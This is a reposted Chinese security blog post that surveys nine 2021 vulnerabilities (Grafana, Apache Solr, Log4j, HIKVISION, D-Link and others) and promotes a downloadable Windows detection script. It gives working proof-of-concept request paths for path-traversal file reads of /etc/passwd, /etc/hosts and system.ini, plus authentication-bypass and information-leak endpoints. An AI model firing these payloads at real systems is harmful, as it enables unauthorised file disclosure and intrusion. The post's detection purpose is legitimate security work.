2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测
grafana任意文件读取漏洞
漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测
poc:
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
页面原型:
漏洞利用:
使用脚本检测,脚本下载请见文末
1. 运行low.exe脚本,页面如下:
2. 选择代号1, 数字1-9分别对应想要检测的漏洞,此处选择1
3. 输入想要测试的url,请注意需要提供完整的域名或者是https://ip:port
https://127.0.0.1:8888 不要在端口号后加反斜杠
Apache Druid任意文件读取漏洞检测
参考链接:
https://blog.csdn.net/weixin_48421613/article/details/121669590
使用脚本检测:
Apache ShenYu身份验证绕过漏洞检测
poc:
/dashboardUser
页面原型:
漏洞检测:
工具检测:
Apache Log4j远程代码执行漏洞
参考链接:
https://mp.weixin.qq.com/s/yPEMotN8HWRptM0-Cm8t7w
脚本检测:
dnslog平台又不太好使了,这个脚本仅能测试记录header头信息的站点,详情请关注上一篇文章
D-Link DCS 信息泄露漏洞检测
/config/getuser?index=0
页面原型:
漏洞检测:
脚本检测:
Apache Solr 存在任意文件读取检测
/solr/admin/cores?indexInfo=false&wt=json
以get方式访问此链接,获取name值
/solr/name值/debug/dump?param=ContentStreams
以post方式访问此链接,body如下
stream.url=file:///etc/hosts
页面原型:
访问 地址获取name值
/solr/admin/cores?indexInfo=false&wt=json
而后以post方式访问漏洞地址,由于部分用户无权限访问etc/passwd,所以为了测试的准确性,仅访问 etc/hosts文件
/solr/name值/debug/dump?param=ContentStreams
以post方式访问此链接,body如下
stream.url=file:///etc/hosts
使用脚本进行检测:
MessageSolution 邮件归档系统认证绕过漏洞
/authenticationserverservlet/
页面原型:
漏洞检测:
脚本检测:
HIKVISION流媒体管理服务器 任意读取漏洞检测
/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
页面原型:
漏洞检测:
工具检测:
Kyan 网络监控设备 信息泄露漏洞
/hosts
页面原型:
漏洞检测:
脚本检测:
脚本获取方式,
https://github.com/Ilovewomen/db_script_v1-/releases/tag/v1.0
或公众号回复
db_script_v1
转自公众号:我不懂安全
友情提示
本文最终解释权归本文作者所有!!!
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一切法律后果均由攻击者承担!!!
日站不规范,亲人两行泪!!!
日站不规范,亲人两行泪!!!
日站不规范,亲人两行泪!!!
-
专注于信息安全方面分享,非营利性组织,不接商业广告
-
关注不迷路,点赞!关注!转发!评论!!
-
要投稿的后台留言即可,会第一时间回复,谢谢!
-
相关推荐: Category-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
Category-811: OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS) ID: 811 Status: Obsolete Summary Weaknesses in this cate…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论